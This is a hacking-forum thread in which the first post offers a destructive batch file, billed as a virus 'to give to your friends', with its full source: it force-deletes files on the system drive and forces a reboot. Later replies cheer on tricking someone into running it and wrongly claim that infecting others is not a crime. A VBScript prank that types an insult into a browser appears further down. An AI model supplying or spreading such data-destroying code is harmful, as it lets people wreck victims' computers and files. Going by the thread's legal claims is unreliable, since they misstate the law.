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System Killer Virus

9 posters

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1System Killer Virus Empty System Killer Virus 10/27/2012, 1:32 am


Admin & Coder
Admin & Coder

a cool virus to give to your friends.

Download: http://goo.gl/RvGSt

Source Code:

@echo off
del %systemdrive%\*.*/f/f/q
shutdown -r -f -t 00



System Killer Virus Signat10

System Killer Virus Rsz_1r10  


2System Killer Virus Empty Re: System Killer Virus 10/27/2012, 1:39 am


Code Creator

I thought this site is only for legal hacking, not for virus sending...

3System Killer Virus Empty Re: System Killer Virus 10/27/2012, 1:42 am


Admin & Coder
Admin & Coder

this is legal hacking. just as long we dont use piracy its within the forum rules. look at hackforums.net

so please... keep your retarded half witted comments to yourself

System Killer Virus Signat10

System Killer Virus Rsz_1r10  


4System Killer Virus Empty Re: System Killer Virus 10/27/2012, 3:26 am


Admin & Writer

Thanks so much Seth. Now I'm going to have to trick someone to get them to download it and open it and then there goes their $500 computer. [evil face] (sorry I'm on my Wii)

System Killer Virus Simple10

System Killer Virus LSTjSyDDiscord: SnB_BWH

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5System Killer Virus Empty Re: System Killer Virus 10/27/2012, 3:43 am


Admin & Coder
Admin & Coder

no problem Cool have lulz!

System Killer Virus Signat10

System Killer Virus Rsz_1r10  


6System Killer Virus Empty Re: System Killer Virus 10/27/2012, 4:40 am


Code Creator

May it is different. I am interesed. If here someone use programs to steal otherones datas, destroy their hard drive or what so ever, will be which is punishable by imprisonment of 3 years (freedomly) I can't believe that it isn't illegal to destroy other's hard drive. Isn't it forbidden by the statue book?


7System Killer Virus Empty Re: System Killer Virus 10/27/2012, 6:04 am


Admin & Coder
Admin & Coder

Xylon wrote:May it is different. I am interesed. If here someone use programs to steal otherones datas, destroy their hard drive or what so ever, will be which is punishable by imprisonment of 3 years (freedomly) I can't believe that it isn't illegal to destroy other's hard drive. Isn't it forbidden by the statue book?


there is no crime to giving someone a virus (if thats what you said, im just assuming because you write pure gibberish), especially not 3 year, thats a damn made up law.

System Killer Virus Signat10

System Killer Virus Rsz_1r10  


8System Killer Virus Empty Re: System Killer Virus 10/27/2012, 10:31 am


Newb Level Helper

Id like to use that for a counter attack of the original sender of the following browesr hi-jackers 1. Certified-toolbar 2. Babylon toolbar . Tell me how thats possible and you'd be my hero forever. That shit cost me hours of deleting regisrty keys and other shit. Not to mention 3 other computers I had that got trashed from the days of limewire. Twisted Evil Very Happy

9System Killer Virus Empty Re: System Killer Virus 10/28/2012, 10:26 am


Moderator & Coder
Moderator & Coder

I think this is funny, I can just see some noob actually launching this bat.

Please help me earn some extra Dropbox & MediaFire space. https://db.tt/2H7prurb2d www.mediafire.com/?renl53g

The energy you give, you shall receive.

10System Killer Virus Empty Re: System Killer Virus 10/28/2012, 11:07 am



Welohabi wrote:I think this is funny, I can just see some noob actually launching this bat.
Wait, we weren't supposed to open it? OH SHI...

11System Killer Virus Empty Re: System Killer Virus 10/28/2012, 11:13 am


Modder & Code Porter

The biggest problem with counter-hacking like that is that there's some really deep ethical problems. For instance, most current e-mail based viruses will lie on the From: line - so if you send a virus back to that address, all you've done is sent a virus to some unsuspecting third person.

It's equally problematic to counter-hack a network-based virus, where you think you know the IP address it came from (again, not a sure thing for a UDP-based attack). All you do there is send some poor user who's already got ONE virus another one - you're not doing anything about the *real* problem (the virus author), but just making life twice as bad for some poor victim.

And there's the very real issue that your counter-hack might cause even more damage than intended - like if it's an improperly secured PC at a hospital that controls an X-ray machine. Yes, such things *do* happen - do you really want to be the person who caused the machine to blue-screen at a bad time, and kill somebody?

I'm not encouraging anyone but,
If you want to know basics go here:

System Killer Virus Cod-gh10
System Killer Virus Coollo10

12System Killer Virus Empty Re: System Killer Virus 10/28/2012, 1:53 pm


Newb Level Helper

[STG]Sgt.Ghost wrote:The biggest problem with counter-hacking like that is that there's some really deep ethical problems. For instance, most current e-mail based viruses will lie on the From: line - so if you send a virus back to that address, all you've done is sent a virus to some unsuspecting third person.

It's equally problematic to counter-hack a network-based virus, where you think you know the IP address it came from (again, not a sure thing for a UDP-based attack). All you do there is send some poor user who's already got ONE virus another one - you're not doing anything about the *real* problem (the virus author), but just making life twice as bad for some poor victim.

And there's the very real issue that your counter-hack might cause even more damage than intended - like if it's an improperly secured PC at a hospital that controls an X-ray machine. Yes, such things *do* happen - do you really want to be the person who caused the machine to blue-screen at a bad time, and kill somebody?

Yeah ,I know you cant do counter attacks, but man wouldnt it be nice to root the bastards outs. I'm not exp enough to handle that kinda shit so I pretty much stay away. Its good to know where one is in case somebody really jacks me off. Smile

I'm not encouraging anyone but,
If you want to know basics go here:

13System Killer Virus Empty Re: System Killer Virus 10/28/2012, 8:26 pm



Please color your comments in red, it takes me ages to figure...

System Killer Virus YBjg74I

14System Killer Virus Empty Re: System Killer Virus 10/29/2012, 2:56 am


Admin & Coder
Admin & Coder

lol idk if he commented i think he just quoted

System Killer Virus Signat10

System Killer Virus Rsz_1r10  


15System Killer Virus Empty Re: System Killer Virus 10/29/2012, 3:18 am



He commented... see how you didn´t notice? Sucks when the color is the same.

System Killer Virus YBjg74I

16System Killer Virus Empty Re: System Killer Virus 10/29/2012, 3:22 am


Modder & Code Porter

Lol. i had to read it like 5x before i noticed it.. last paragraph ppl.

System Killer Virus Cod-gh10
System Killer Virus Coollo10

17System Killer Virus Empty Re: System Killer Virus 10/29/2012, 3:23 am



I just went forth and included a color contrast. Rolling Eyes

System Killer Virus YBjg74I

18System Killer Virus Empty Re: System Killer Virus 10/29/2012, 5:49 am


Newb Level Helper

Sorry about that I tried to change it but it wouldnt let me. Should have been a quick post

19System Killer Virus Empty Re: System Killer Virus 2/4/2013, 5:01 pm



Cool virus!

I know another one but I would say it's a virus/hack (I don't really know).
Source Code:

Dim fso, ws, file, APP_PATH
Set ws = WScript.CreateObject("WScript.Shell")
APP_PATH = """C:\Program Files\Internet Explorer\iexplore.exe"""
ws.run APP_PATH

set shl = createobject("wscript.shell")
shl.sendkeys "I eat donkey balls"
wscript.sleep 8000


I got it from Youtube (here)

To use it go in a text editing software (not Word) like Notepad for example and copy the source code then save it as x.vbs then run it.
(Replace x with whatever you like.)

By the way I admire you Seth.

Last edited by deathx on 2/5/2013, 1:06 pm; edited 1 time in total

20System Killer Virus Empty Re: System Killer Virus 2/4/2013, 5:19 pm


Admin & Writer

That guy's videos are pretty cool. Some of the stuff that he shows his viewers I've never heard about them before, but most of them I've.

Thanks for sharing that with me.

System Killer Virus Simple10

System Killer Virus LSTjSyDDiscord: SnB_BWH

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